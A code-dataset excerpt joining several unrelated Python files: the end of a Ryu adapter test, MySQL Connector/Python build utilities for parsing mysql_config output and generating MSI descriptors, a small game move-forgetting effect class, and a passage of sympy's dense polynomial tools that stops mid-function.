ev = mock.Mock()
ev.msg.table_id = 10
self.ryu_df_adapter.register_table_handler(
10, self.mock_app.packet_in_handler)
self.ryu_df_adapter.OF_packet_in_handler(ev)
self.mock_app.assert_has_calls([mock.call.packet_in_handler(ev)])
| 1.9375 | 2 |
cpydist/utils.py | timgates42/mysql-connector-python | 1 | 12795709 | <filename>cpydist/utils.py<gh_stars>1-10
# Copyright (c) 2020, Oracle and/or its affiliates.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2.0, as
# published by the Free Software Foundation.
#
# This program is also distributed with certain software (including
# but not limited to OpenSSL) that is licensed under separate terms,
# as designated in a particular file or component or in included license
# documentation. The authors of MySQL hereby grant you an
# additional permission to link the program and your derivative works
# with the separately licensed software that they have included with
# MySQL.
#
# Without limiting anything contained in the foregoing, this file,
# which is part of MySQL Connector/Python, is also subject to the
# Universal FOSS Exception, version 1.0, a copy of which can be found at
# http://oss.oracle.com/licenses/universal-foss-exception.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License, version 2.0, for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""Miscellaneous utility functions."""
import gzip
import logging
import os
import platform
import re
import shlex
import subprocess
import struct
import sys
import tarfile
from datetime import datetime
from distutils.errors import DistutilsInternalError
from distutils.dir_util import mkpath
from distutils.file_util import copy_file
from distutils.spawn import find_executable
from distutils.sysconfig import get_python_version
from distutils.version import LooseVersion
from subprocess import Popen, PIPE
from xml.dom.minidom import parse, parseString
try:
from dateutil.tz import tzlocal
NOW = datetime.now(tzlocal())
except ImportError:
NOW = datetime.now()
try:
from urllib.parse import parse_qsl
except ImportError:
from urlparse import parse_qsl
ARCH = "64-bit" if sys.maxsize > 2**33 else "32-bit"
ARCH_64BIT = ARCH == "64-bit"
MYSQL_C_API_MIN_VERSION = (8, 0, 0)
LOGGER = logging.getLogger("cpydist")
# 64bit Conditional check, only includes VCPPREDIST2015 property
VC_RED_64 = (
'<Product>'
'<!-- Check Visual c++ Redistributable is Installed -->'
'<Property Id="VS14REDIST">'
' <RegistrySearch Id="FindRedistVS14" Root="HKLM"'
' Key="SOFTWARE\\Microsoft\\DevDiv\\vc\\Servicing\\14.0\\RuntimeMinimum"'
' Name="Version" Type="raw" />'
'</Property>'
'<Condition Message="This application requires Visual Studio 2015'
' Redistributable. Please install the Redistributable then run this'
' installer again.">'
' Installed OR VS14REDIST'
'</Condition>'
'</Product>'
)
# 64bit Conditional check, only install if OS is 64bit. Used in MSI-64
ONLY_64bit = (
'<Product>'
'<Condition Message="This version of the installer is only suitable to'
' run on 64 bit operating systems.">'
'<![CDATA[Installed OR (VersionNT64 >=600)]]>'
'</Condition>'
'</Product>'
)
def _parse_mysql_info_line(line):
"""Parse a command line.
This will never be perfect without special knowledge about all possible
command lines "mysql_config" might output. But it should be close enough
for our usage.
"""
args = shlex.split(line)
# Find out what kind of argument it is first,
# if starts with "--", "-" or nothing
pre_parsed_line = []
for arg in args:
re_obj = re.search(r"^(--|-|)(.*)", arg)
pre_parsed_line.append(re_obj.group(1, 2))
parsed_line = []
while pre_parsed_line:
(type1, opt1) = pre_parsed_line.pop(0)
if "=" in opt1:
# One of "--key=val", "-key=val" or "key=val"
parsed_line.append(tuple(opt1.split("=", 1)))
elif type1:
# We have an option that might have a value
# in the next element in the list
if pre_parsed_line:
(type2, opt2) = pre_parsed_line[0]
if type2 == "" and "=" not in opt2:
# Value was in the next list element
parsed_line.append((opt1, opt2))
pre_parsed_line.pop(0)
continue
if type1 == "--":
# If "--" and no argument then it is an option like "--fast"
parsed_line.append(opt1)
else:
# If "-" (and no "=" handled above) then it is a
# traditional one character option name that might
# have a value
val = opt1[1:]
if val:
parsed_line.append((opt1[:1], val))
else:
parsed_line.append(opt1)
else:
LOGGER.warning("Could not handle '%s' in '%s'", opt1, line)
return parsed_line
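# e.g. _parse_mysql_info_line("-I/usr/include/mysql -L/usr/lib -lmysqlclient --fast")
# returns [('I', '/usr/include/mysql'), ('L', '/usr/lib'), ('l', 'mysqlclient'), 'fast']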
def _mysql_c_api_info_win(mysql_capi):
"""Get MySQL information without using mysql_config tool.
Returns:
dict: A dict containing information about the MySQL C API installation.
"""
info = {}
mysql_version_h = os.path.join(mysql_capi, "include", "mysql_version.h")
if not os.path.exists(mysql_version_h):
LOGGER.error("Invalid MySQL C API installation "
"(mysql_version.h not found)")
sys.exit(1)
# Get MySQL version
with open(mysql_version_h, "rb") as fp:
for line in fp.readlines():
if b"#define LIBMYSQL_VERSION" in line:
version = LooseVersion(
line.split()[2].replace(b'"', b'').decode()
).version
if tuple(version) < MYSQL_C_API_MIN_VERSION:
LOGGER.error("MySQL C API {} or later required"
"".format(MYSQL_C_API_MIN_VERSION))
sys.exit(1)
break
info["libraries"] = ["libmysql"]
info["library_dirs"] = [os.path.join(mysql_capi, "lib")]
info["include_dirs"] = [os.path.join(mysql_capi, "include")]
# Get libmysql.dll arch
connc_64bit = _win_dll_is64bit(
os.path.join(mysql_capi, "lib", "libmysql.dll"))
LOGGER.debug("connc_64bit: {0}".format(connc_64bit))
info["arch"] = "x86_64" if connc_64bit else "i386"
return info
def mysql_c_api_info(mysql_config):
"""Get MySQL information using mysql_config tool.
Returns:
dict: Containing MySQL information about libraries.
"""
if os.name == "nt":
return _mysql_c_api_info_win(mysql_config)
if os.path.isdir(mysql_config):
mysql_config = os.path.join(mysql_config, "bin", "mysql_config")
LOGGER.info("Getting MySQL information from %s", mysql_config)
process = Popen([mysql_config], stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if not stdout:
raise ValueError("Error executing command: {} ({})"
"".format(mysql_config, stderr))
# Parse the output. Try to be future safe in case new options
# are added. This might of course fail.
info = {}
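# A mysql_config output line typically looks like
#   "        --libs_r         [-L/usr/lib64/mysql -lmysqlclient]"
# and the regex below captures the option name and the bracketed value.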
for line in stdout.splitlines():
re_obj = re.search(
r"^\s+(?:--)?(\w+)\s+\[\s*(.*?)\s*\]", line.decode("utf-8"))
if re_obj:
mc_key = re_obj.group(1)
mc_val = re_obj.group(2)
# We always add the raw output from the different "mysql_config"
# options. And in some cases, like "port", "socket", that is enough
# for use from Python.
info[mc_key] = mc_val
LOGGER.debug("%s: %s", mc_key, mc_val)
if not re.search(r"^-", mc_val) and "=" not in mc_val:
# Not a Unix command line
continue
# In addition form useful information parsed from the
# above command line
parsed_line = _parse_mysql_info_line(mc_val)
if mc_key == "include":
# Lets assume all arguments are paths with "-I", "--include",..
include_dirs = [val for _, val in parsed_line]
info["include_dirs"] = include_dirs
LOGGER.debug("include_dirs: %s", " ".join(include_dirs))
elif mc_key == "libs_r":
info["link_dirs"] = [val for key, val in parsed_line
if key in ("L", "library-path",)]
info["libraries"] = [val for key, val in parsed_line
if key in ("l", "library",)]
LOGGER.debug("link_dirs: %s", " ".join(info["link_dirs"]))
LOGGER.debug("libraries: %s", " ".join(info["libraries"]))
# Try to figure out the architecture
info["arch"] = "x86_64" if sys.maxsize > 2**32 else "i386"
# Return a tuple for version instead of a string
info["version"] = tuple([int(num) if num.isdigit() else num
for num in info["version"].split(".")])
return info
def get_git_info():
"""Get Git information about the last commit.
Returns:
dict: A dict containing the information about the last commit.
"""
is_git_repo = False
if find_executable("git") is not None:
# Check if it's a Git repository
proc = Popen(["git", "--no-pager", "branch"], universal_newlines=True)
proc.communicate()
is_git_repo = proc.returncode == 0
if is_git_repo:
cmd = ["git", "log", "-n", "1", "--date=iso",
"--pretty=format:'branch=%D&date=%ad&commit=%H&short=%h'"]
proc = Popen(cmd, stdout=PIPE, universal_newlines=True)
stdout, _ = proc.communicate()
git_info = dict(parse_qsl(stdout.replace("'", "").replace("+", "%2B")
.split(",")[-1:][0].strip()))
try:
git_info["branch"] = stdout.split(",")[0].split("->")[1].strip()
except IndexError:
git_info["branch"] = stdout.split(",")[0].split("=")[1].strip()
return git_info
branch_src = os.getenv("BRANCH_SOURCE")
push_rev = os.getenv("PUSH_REVISION")
if branch_src and push_rev:
git_info = {
"branch": branch_src.split()[-1],
"date": None,
"commit": push_rev,
"short": push_rev[:7]
}
return git_info
return None
def write_info_src(version):
"""Generate docs/INFO_SRC.
Returns:
bool: ``True`` if `docs/INFO_SRC` was written successfully.
"""
git_info = get_git_info()
if git_info:
with open(os.path.join("docs", "INFO_SRC"), "w") as info_src:
info_src.write("version: {}\n".format(version))
if git_info:
info_src.write("branch: {}\n".format(git_info["branch"]))
if git_info.get("date"):
info_src.write("date: {}\n".format(git_info["date"]))
info_src.write("commit: {}\n".format(git_info["commit"]))
info_src.write("short: {}\n".format(git_info["short"]))
return True
return False
def write_info_bin(mysql_version=None, compiler=None):
"""Generate docs/INFO_BIN.
Args:
mysql_version (Optional[str]): The MySQL version.
Returns:
bool: ``True`` if `docs/INFO_BIN` was written successfully.
"""
now = NOW.strftime("%Y-%m-%d %H:%M:%S %z")
with open(os.path.join("docs", "INFO_BIN"), "w") as info_bin:
info_bin.write("build-date: {}\n".format(now))
info_bin.write("os-info: {}\n".format(platform.platform()))
if mysql_version:
info_bin.write("mysql-version: {}\n".format(mysql_version))
if compiler:
info_bin.write("compiler: {}\n".format(compiler))
def _parse_release_file(release_file):
"""Parse the contents of /etc/lsb-release or /etc/os-release file.
Returns:
A dictionary containing release information.
"""
distro = {}
if os.path.exists(release_file):
with open(release_file) as file_obj:
for line in file_obj:
key_value = line.split("=")
if len(key_value) != 2:
continue
key = key_value[0].lower()
value = key_value[1].rstrip("\n").strip('"')
distro[key] = value
return distro
def _parse_lsb_release_command():
"""Parse the output of the lsb_release command.
Returns:
A dictionary containing release information.
"""
distro = {}
with open(os.devnull, "w") as devnull:
try:
stdout = subprocess.check_output(
("lsb_release", "-a"), stderr=devnull)
except OSError:
return None
lines = stdout.decode(sys.getfilesystemencoding()).splitlines()
for line in lines:
key_value = line.split(":")
if len(key_value) != 2:
continue
key = key_value[0].replace(" ", "_").lower()
value = key_value[1].strip("\t")
distro[key] = value
return distro
def linux_distribution():
"""Try to determine the name of the Linux OS distribution name.
First try to get information from ``/etc/lsb-release`` file.
If it fails, try to get the information of ``lsb-release`` command.
And finally the information of ``/etc/os-release`` file.
Returns:
tuple: A tuple with (`name`, `version`, `codename`)
"""
distro = _parse_release_file(os.path.join("/etc", "lsb-release"))
if distro:
return (distro.get("distrib_id", ""),
distro.get("distrib_release", ""),
distro.get("distrib_codename", ""))
distro = _parse_lsb_release_command()
if distro:
return (distro.get("distributor_id", ""),
distro.get("release", ""),
distro.get("codename", ""))
distro = _parse_release_file(os.path.join("/etc", "os-release"))
if distro:
return (distro.get("name", ""),
distro.get("version_id", ""),
distro.get("version_codename", ""))
return ("", "", "")
def get_dist_name(distribution, source_only_dist=False, platname=None,
python_version=None, label="", edition=""):
"""Get the distribution name.
Get the distribution name usually used for creating the egg file. The
Python version is excluded from the name when source_only_dist is True.
The platname will be added when it is given at the end.
Returns:
str: The distribution name.
"""
name = [distribution.metadata.name]
if edition:
name.append(edition)
if label:
name.append("-{}".format(label))
name.append("-{}".format(distribution.metadata.version))
if not source_only_dist or python_version:
pyver = python_version or get_python_version()
name.append("-py{}".format(pyver))
if platname:
name.append("-{}".format(platname))
return "".join(name)
def get_magic_tag():
"""Return the magic tag for .pyc files."""
return sys.implementation.cache_tag
def unarchive_targz(tarball):
"""Unarchive a tarball.
Unarchives the given tarball. If the tarball has the extension
'.gz', it will be first uncompressed.
Returns the path to the folder of the first unarchived member.
Returns str.
"""
orig_wd = os.getcwd()
(dstdir, tarball_name) = os.path.split(tarball)
if dstdir:
os.chdir(dstdir)
if '.gz' in tarball_name:
new_file = tarball_name.replace('.gz', '')
gz = gzip.GzipFile(tarball_name)
tar = open(new_file, 'wb')
tar.write(gz.read())
tar.close()
tarball_name = new_file
tar = tarfile.TarFile(tarball_name)
tar.extractall()
os.unlink(tarball_name)
os.chdir(orig_wd)
return os.path.abspath(os.path.join(dstdir, tar.getmembers()[0].name))
def add_docs(doc_path, doc_files=None):
"""Prepare documentation files for Connector/Python."""
mkpath(doc_path)
if not doc_files:
doc_files = [
'mysql-connector-python.pdf',
'mysql-connector-python.html',
'mysql-html.css',
]
for file_name in doc_files:
# Check if we have file in docs/
doc_file = os.path.join('docs', file_name)
if not os.path.exists(doc_file):
# it might be in build/
doc_file = os.path.join('build', file_name)
if not os.path.exists(doc_file):
# we do not have it, create a fake one
LOGGER.warning("documentation '%s' does not exist; creating"
" empty", doc_file)
open(doc_file, "w").close()
if os.path.abspath(os.path.dirname(doc_file)) != os.path.abspath(doc_path):
# don't copy the file onto itself
copy_file(doc_file, doc_path)
# Windows MSI descriptor parser
# Customization utility functions for the C/py product msi descriptor
def _win_dll_is64bit(dll_file):
"""Check if a Windows DLL is 64 bit or not.
Raises:
ValueError: When magic of header is invalid.
IOError: When file could not be read.
OSError: when execute on none-Windows platform.
Returns:
bool: True if is a 64 bit library.
"""
if os.name != "nt":
raise OSError("win_ddl_is64bit only useful on Windows")
with open(dll_file, "rb") as fp:
# IMAGE_DOS_HEADER
e_magic = fp.read(2)
if e_magic != b'MZ':
raise ValueError("Wrong magic in header")
fp.seek(60)
offset = struct.unpack("I", fp.read(4))[0]
# IMAGE_FILE_HEADER
fp.seek(offset)
file_header = fp.read(6)
(_, machine) = struct.unpack("<4sH", file_header)
if machine == 0x014c: # IMAGE_FILE_MACHINE_I386
return False
elif machine in (0x8664, 0x2000): # IMAGE_FILE_MACHINE_AMD64 and other 64-bit machine types
return True
def _append_child_from_unparsed_xml(father_node, unparsed_xml):
"""Append child xml nodes to a node."""
dom_tree = parseString(unparsed_xml)
if dom_tree.hasChildNodes():
first_child = dom_tree.childNodes[0]
if first_child.hasChildNodes():
child_nodes = first_child.childNodes
for _ in range(len(child_nodes)):
childNode = child_nodes.item(0)
father_node.appendChild(childNode)
return
raise DistutilsInternalError("Could not Append append elements to "
"the Windows msi descriptor.")
def _get_element(dom_msi, tag_name, name=None, id_=None):
"""Get a xml element defined on Product."""
product = dom_msi.getElementsByTagName("Product")[0]
elements = product.getElementsByTagName(tag_name)
for element in elements:
if name and id_:
if element.getAttribute('Name') == name and \
element.getAttribute('Id') == id_:
return element
elif id_:
if element.getAttribute('Id') == id_:
return element
def _add_64bit_elements(dom_msi, add_vs_redist=True):
"""Add the properties and conditions elements to the xml msi descriptor."""
# Get the Product xml element
product = dom_msi.getElementsByTagName("Product")[0]
# Append children
if add_vs_redist:
LOGGER.info("Adding vc_red_64 element")
_append_child_from_unparsed_xml(product, VC_RED_64)
LOGGER.info("Adding only_64bit element")
_append_child_from_unparsed_xml(product, ONLY_64bit)
def add_arch_dep_elems(xml_path, result_path, for32=False, add_vs_redist=True):
"""Add the architecture dependent properties and conditions.
Args:
xml_path (str): The original xml msi descriptor path.
result_path (str): Path to save the resulting xml.
add_vs_redist (bool): Add the VS redistributable requirement.
"""
dom_msi = parse(xml_path)
if for32:
LOGGER.info("No elements to add for 32bit msi")
else:
LOGGER.info("Adding 64bit elements")
_add_64bit_elements(dom_msi, add_vs_redist)
LOGGER.info("Saving xml to:%s working directory:%s",
result_path, os.getcwd())
with open(result_path, "w+") as fp:
fp.write(dom_msi.toprettyxml())
fp.flush()
fp.close()
| 1.5625 | 2 |
game/combat/effects/forgetmoveeffect.py | Sipondo/ulix-dexflow | 5 | 12795710 | from .baseeffect import BaseEffect
class ForgetMoveEffect(BaseEffect):
def __init__(self, scene, action):
super().__init__(scene)
self.spd_on_action = 250
self.target = action.target
self.move = action.a_index
def on_action(self):
actor = self.scene.board.get_actor(self.target)
forgotten_move = actor.actions.pop(self.move)
self.scene.board.new_move = False
self.scene.board.no_skip(
f"{self.scene.board.get_actor(self.target).name} forgot {forgotten_move['name']}!", particle=""
)
return True, False, False
| 2.484375 | 2 |
sympy/polys/densetools.py | matthew-brett/sympy | 0 | 12795711 | <gh_stars>0
"""Advanced tools for dense recursive polynomials in `K[x]` or `K[X]`. """
from sympy.polys.densebasic import (
dup_strip, dmp_strip,
dup_reverse,
dup_convert, dmp_convert,
dup_degree, dmp_degree, dmp_degree_in,
dup_to_dict, dmp_to_dict,
dup_from_dict, dmp_from_dict,
dup_LC, dmp_LC, dmp_ground_LC,
dup_TC, dmp_TC, dmp_ground_TC,
dmp_zero, dmp_one, dmp_ground,
dmp_zero_p, dmp_one_p,
dmp_multi_deflate, dmp_inflate,
dup_to_raw_dict, dup_from_raw_dict,
dmp_raise, dmp_apply_pairs,
dmp_inject, dmp_zeros
)
from sympy.polys.densearith import (
dup_add_term, dmp_add_term,
dup_mul_term, dmp_mul_term,
dup_lshift, dup_rshift,
dup_neg, dmp_neg,
dup_add, dmp_add,
dup_sub, dmp_sub,
dup_mul, dmp_mul,
dup_pow, dmp_pow,
dup_div, dmp_div,
dup_rem, dmp_rem,
dup_quo, dmp_quo,
dup_exquo, dmp_exquo,
dup_prem, dmp_prem,
dup_expand, dmp_expand,
dup_add_mul, dup_sub_mul,
dup_mul_ground, dmp_mul_ground,
dup_quo_ground, dmp_quo_ground,
dup_exquo_ground, dmp_exquo_ground,
dup_max_norm, dmp_max_norm
)
from sympy.polys.galoistools import (
gf_int, gf_crt
)
from sympy.polys.polyerrors import (
HeuristicGCDFailed,
HomomorphismFailed,
RefinementFailed,
NotInvertible,
DomainError
)
from sympy.ntheory import nextprime
from sympy.utilities import (
cythonized, variations
)
from random import random as randfloat
def dup_ground_to_ring(f, K0, K1=None, **args):
"""Clear denominators, i.e. transform `K_0` to `K_1`. """
if K1 is None:
K1 = K0.get_ring()
common = K1.one
for c in f:
common = K1.lcm(common, K0.denom(c))
if not K1.is_one(common):
f = dup_mul_ground(f, common, K0)
if not args.get('convert'):
return common, f
else:
return common, dup_convert(f, K0, K1)
@cythonized("v,w")
def _rec_ground_to_ring(g, v, K0, K1):
"""XXX"""
common = K1.one
if not v:
for c in g:
common = K1.lcm(common, K0.denom(c))
else:
w = v-1
for c in g:
common = K1.lcm(common, _rec_ground_to_ring(c, w, K0, K1))
return common
@cythonized("u")
def dmp_ground_to_ring(f, u, K0, K1=None, **args):
"""Clear denominators, i.e. transform `K_0` to `K_1`. """
if not u:
return dup_ground_to_ring(f, K0, K1)
if K1 is None:
K1 = K0.get_ring()
common = _rec_ground_to_ring(f, u, K0, K1)
if not K1.is_one(common):
f = dmp_mul_ground(f, common, u, K0)
if not args.get('convert'):
return common, f
else:
return common, dmp_convert(f, u, K0, K1)
@cythonized("m,n,i,j")
def dup_integrate(f, m, K):
"""Computes indefinite integral of `f` in `K[x]`. """
if m <= 0 or not f:
return f
g = [K.zero]*m
for i, c in enumerate(reversed(f)):
n = i+1
for j in xrange(1, m):
n *= i+j+1
g.insert(0, K.quo(c, K(n)))
return g
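# e.g. over K = QQ, integrating [2, 0] (the polynomial 2*x) once gives
# [1, 0, 0], i.e. x**2 (dense coefficients run from highest degree down)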
@cythonized("m,u,v,n,i,j")
def dmp_integrate(f, m, u, K):
"""Computes indefinite integral of `f` in `x_0` in `K[X]`. """
if not u:
return dup_integrate(f, m, K)
if m <= 0 or dmp_zero_p(f, u):
return f
g, v = dmp_zeros(m, u-1, K), u-1
for i, c in enumerate(reversed(f)):
n = i+1
for j in xrange(1, m):
n *= i+j+1
g.insert(0, dmp_quo_ground(c, K(n), v, K))
return g
@cythonized("m,v,w,i,j")
def _rec_integrate_in(g, m, v, i, j, K):
"""XXX"""
if i == j:
return dmp_integrate(g, m, v, K)
w, i = v-1, i+1
return dmp_strip([ _rec_integrate_in(c, m, w, i, j, K) for c in g ], v)
@cythonized("m,j,u")
def dmp_integrate_in(f, m, j, u, K):
"""Computes indefinite integral of `f` in `x_j` in `K[X]`. """
if j < 0 or j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
return _rec_integrate_in(f, m, u, 0, j, K)
@cythonized("m,n,i")
def dup_diff(f, m, K):
"""m-th order derivative of a polynomial in `K[x]`. """
if m <= 0:
return f
n = dup_degree(f)
if n < m:
return []
deriv, c = [], K.one
for i in xrange(0, m):
c, n = c*K(n), n-1
for coeff in f[:-m]:
deriv.append(coeff*c)
c, n = K(n)*K.exquo(c, K(n+m)), n-1
return deriv
@cythonized("u,v,m,n,i")
def dmp_diff(f, m, u, K):
"""m-th order derivative in `x_0` of a polynomial in `K[X]`. """
if not u:
return dup_diff(f, m, K)
if m <= 0:
return f
n = dmp_degree(f, u)
if n < m:
return dmp_zero(u)
deriv, c, v = [], K.one, u-1
for i in xrange(0, m):
c, n = c*K(n), n-1
for coeff in f[:-m]:
h = dmp_mul_ground(coeff, c, v, K)
c, n = K(n)*K.exquo(c, K(n+m)), n-1
deriv.append(h)
return deriv
@cythonized("m,v,w,i,j")
def _rec_diff_in(g, m, v, i, j, K):
"""XXX"""
if i == j:
return dmp_diff(g, m, v, K)
w, i = v-1, i+1
return dmp_strip([ _rec_diff_in(c, m, w, i, j, K) for c in g ], v)
@cythonized("m,j,u")
def dmp_diff_in(f, m, j, u, K):
"""m-th order derivative in `x_j` of a polynomial in `K[X]`. """
if j < 0 or j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
return _rec_diff_in(f, m, u, 0, j, K)
def dup_eval(f, a, K):
"""Evaluate a polynomial at `x = a` in `K[x]` using Horner scheme. """
if not a:
return dup_TC(f, K)
result = K.zero
for c in f:
result *= a
result += c
return result
@cythonized("u,v")
def dmp_eval(f, a, u, K):
"""Evaluate a polynomial at `x_0 = a` in `K[X]` using Horner scheme. """
if not u:
return dup_eval(f, a, K)
if not a:
return dmp_TC(f, K)
result, v = dmp_LC(f, K), u-1
for coeff in f[1:]:
result = dmp_mul_ground(result, a, v, K)
result = dmp_add(result, coeff, v, K)
return result
@cythonized("v,i,j")
def _rec_eval_in(g, a, v, i, j, K):
"""XXX"""
if i == j:
return dmp_eval(g, a, v, K)
v, i = v-1, i+1
return dmp_strip([ _rec_eval_in(c, a, v, i, j, K) for c in g ], v)
@cythonized("u")
def dmp_eval_in(f, a, j, u, K):
"""Evaluate a polynomial at `x_j = a` in `K[X]` using Horner scheme. """
if j < 0 or j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
return _rec_eval_in(f, a, u, 0, j, K)
@cythonized("i,u")
def _rec_eval_tail(g, i, A, u, K):
"""XXX"""
if i == u:
return dup_eval(g, A[-1], K)
else:
h = [ _rec_eval_tail(c, i+1, A, u, K) for c in g ]
if i < u - len(A) + 1:
return h
else:
return dup_eval(h, A[-u+i-1], K)
@cythonized("u")
def dmp_eval_tail(f, A, u, K):
"""Evaluate a polynomial at `x_j = a_j, ...` in `K[X]`. """
if not A:
return f
if dmp_zero_p(f, u):
return dmp_zero(u - len(A))
e = _rec_eval_tail(f, 0, A, u, K)
if u == len(A)-1:
return e
else:
return dmp_strip(e, u - len(A))
@cythonized("m,v,i,j")
def _rec_diff_eval(g, m, a, v, i, j, K):
"""XXX"""
if i == j:
return dmp_eval(dmp_diff(g, m, v, K), a, v, K)
v, i = v-1, i+1
return dmp_strip([ _rec_diff_eval(c, m, a, v, i, j, K) for c in g ], v)
@cythonized("m,j,u")
def dmp_diff_eval_in(f, m, a, j, u, K):
"""Differentiate and evaluate a polynomial in `x_j` at `a` in `K[X]`. """
if j > u:
raise IndexError("-%s <= j < %s expected, got %s" % (u, u, j))
if not j:
return dmp_eval(dmp_diff(f, m, u, K), a, u, K)
return _rec_diff_eval(f, m, a, u, 0, j, K)
def dup_half_gcdex(f, g, K):
"""Half extended Euclidean algorithm in `F[x]`. """
if not K.has_Field:
raise DomainError('computation can be done only in a field')
a, b = [K.one], []
while g:
q, r = dup_div(f, g, K)
f, g = g, r
a, b = b, dup_sub_mul(a, q, b, K)
a = dup_quo_ground(a, dup_LC(f, K), K)
f = dup_monic(f, K)
return a, f
def dup_gcdex(f, g, K):
"""Extended Euclidean algorithm in `F[x]`. """
s, h = dup_half_gcdex(f, g, K)
F = dup_sub_mul(h, s, f, K)
t = dup_exquo(F, g, K)
return s, t, h
def dup_invert(f, g, K):
"""Compute multiplicative inverse of `f` in `F[x]/(g(x))`. """
s, h = dup_half_gcdex(f, g, K)
if h == [K.one]:
return dup_rem(s, g, K)
else:
raise NotInvertible("zero divisor")
@cythonized("n,m,d,k")
def dup_inner_subresultants(f, g, K):
"""Subresultant PRS algorithm in `K[x]`. """
n = dup_degree(f)
m = dup_degree(g)
if n < m:
f, g = g, f
n, m = m, n
R = [f, g]
d = n - m
b = (-K.one)**(d+1)
c = -K.one
B, D = [b], [d]
if not f or not g:
return R, B, D
h = dup_prem(f, g, K)
h = dup_mul_ground(h, b, K)
while h:
k = dup_degree(h)
R.append(h)
lc = dup_LC(g, K)
if not d:
q = c
else:
q = c**(d-1)
c = K.exquo((-lc)**d, q)
b = -lc * c**(m-k)
f, g, m, d = g, h, k, m-k
B.append(b)
D.append(d)
h = dup_prem(f, g, K)
h = dup_exquo_ground(h, b, K)
return R, B, D
def dup_subresultants(f, g, K):
"""Computes subresultant PRS of two polynomials in `K[x]`. """
return dup_inner_subresultants(f, g, K)[0]
@cythonized("s,i,du,dv,dw")
def dup_prs_resultant(f, g, K):
"""Resultant algorithm in `K[x]` using subresultant PRS. """
if not f or not g:
return (K.zero, [])
R, B, D = dup_inner_subresultants(f, g, K)
if dup_degree(R[-1]) > 0:
return (K.zero, R)
if R[-2] == [K.one]:
return (dup_LC(R[-1], K), R)
s, i = 1, 1
p, q = K.one, K.one
for b, d in zip(B, D)[:-1]:
du = dup_degree(R[i-1])
dv = dup_degree(R[i ])
dw = dup_degree(R[i+1])
if du % 2 and dv % 2:
s = -s
lc, i = dup_LC(R[i], K), i+1
p *= b**dv * lc**(du-dw)
q *= lc**(dv*(1+d))
if s < 0:
p = -p
i = dup_degree(R[-2])
res = dup_LC(R[-1], K)**i
res = K.quo(res*p, q)
return res, R
def dup_resultant(f, g, K):
"""Computes resultant of two polynomials in `K[x]`. """
return dup_prs_resultant(f, g, K)[0]
@cythonized("u,v,n,m,d,k")
def dmp_inner_subresultants(f, g, u, K):
"""Subresultant PRS algorithm in `K[X]`. """
if not u:
return dup_inner_subresultants(f, g, K)
n = dmp_degree(f, u)
m = dmp_degree(g, u)
if n < m:
f, g = g, f
n, m = m, n
R = [f, g]
d = n - m
v = u - 1
b = dmp_pow(dmp_ground(-K.one, v), d+1, v, K)
c = dmp_ground(-K.one, v)
B, D = [b], [d]
if dmp_zero_p(f, u) or dmp_zero_p(g, u):
return R, B, D
h = dmp_prem(f, g, u, K)
h = dmp_mul_term(h, b, 0, u, K)
while not dmp_zero_p(h, u):
k = dmp_degree(h, u)
R.append(h)
lc = dmp_LC(g, K)
p = dmp_pow(dmp_neg(lc, v, K), d, v, K)
if not d:
q = c
else:
q = dmp_pow(c, d-1, v, K)
c = dmp_exquo(p, q, v, K)
b = dmp_mul(dmp_neg(lc, v, K),
dmp_pow(c, m-k, v, K), v, K)
f, g, m, d = g, h, k, m-k
B.append(b)
D.append(d)
h = dmp_prem(f, g, u, K)
h = [ dmp_exquo(ch, b, v, K) for ch in h ]
return R, B, D
@cythonized("u")
def dmp_subresultants(f, g, u, K):
"""Computes subresultant PRS of two polynomials in `K[X]`. """
return dmp_inner_subresultants(f, g, u, K)[0]
@cythonized("u,v,s,i,d,du,dv,dw")
def dmp_prs_resultant(f, g, u, K):
"""Resultant algorithm in `K[X]` using subresultant PRS. """
if not u:
return dup_prs_resultant(f, g, K)
if dmp_zero_p(f, u) or dmp_zero_p(g, u):
return (dmp_zero(u-1), [])
R, B, D = dmp_inner_subresultants(f, g, u, K)
if dmp_degree(R[-1], u) > 0:
return (dmp_zero(u-1), R)
if dmp_one_p(R[-2], u, K):
return (dmp_LC(R[-1], K), R)
s, i, v = 1, 1, u-1
p = dmp_one(v, K)
q = dmp_one(v, K)
for b, d in zip(B, D)[:-1]:
du = dmp_degree(R[i-1], u)
dv = dmp_degree(R[i ], u)
dw = dmp_degree(R[i+1], u)
if du % 2 and dv % 2:
s = -s
lc, i = dmp_LC(R[i], K), i+1
p = dmp_mul(dmp_mul(p, dmp_pow(b, dv, v, K), v, K),
dmp_pow(lc, du-dw, v, K), v, K)
q = dmp_mul(q, dmp_pow(lc, dv*(1+d), v, K), v, K)
_, p, q = dmp_inner_gcd(p, q, v, K)
if s < 0:
p = dmp_neg(p, v, K)
i = dmp_degree(R[-2], u)
res = dmp_pow(dmp_LC(R[-1], K), i, v, K)
res = dmp_quo(dmp_mul(res, p, v, K), q, v, K)
return res, R
@cythonized("u,v,n,m,N,M,B")
def dmp_zz_modular_resultant(f, g, p, u, K):
"""Compute resultant of `f` and `g` modulo a prime `p`. """
if not u:
return gf_int(dup_prs_resultant(f, g, K)[0] % p, p)
v = u - 1
n = dmp_degree(f, u)
m = dmp_degree(g, u)
N = dmp_degree_in(f, 1, u)
M = dmp_degree_in(g, 1, u)
B = n*M + m*N
D, a = [K.one], -K.one
r = dmp_zero(v)
while dup_degree(D) <= B:
while True:
a += K.one
if a == p:
raise HomomorphismFailed('no luck')
F = dmp_eval_in(f, gf_int(a, p), 1, u, K)
if dmp_degree(F, v) == n:
G = dmp_eval_in(g, gf_int(a, p), 1, u, K)
if dmp_degree(G, v) == m:
break
R = dmp_zz_modular_resultant(F, G, p, v, K)
e = dmp_eval(r, a, v, K)
if not v:
R = dup_strip([R])
e = dup_strip([e])
else:
R = [R]
e = [e]
d = K.invert(dup_eval(D, a, K), p)
d = dup_mul_ground(D, d, K)
d = dmp_raise(d, v, 0, K)
c = dmp_mul(d, dmp_sub(R, e, v, K), v, K)
r = dmp_add(r, c, v, K)
